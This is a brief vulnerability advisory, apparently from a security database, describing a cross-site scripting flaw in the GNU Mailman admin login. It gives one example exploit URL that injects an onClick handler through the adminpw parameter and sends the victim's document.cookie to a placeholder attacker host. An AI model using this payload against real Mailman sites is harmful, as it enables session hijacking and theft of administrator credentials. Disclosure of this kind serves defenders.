GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability

GNU Mailman Admin Login Variant Cross-Site Scripting Vulnerability

The following example was provided:

http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie);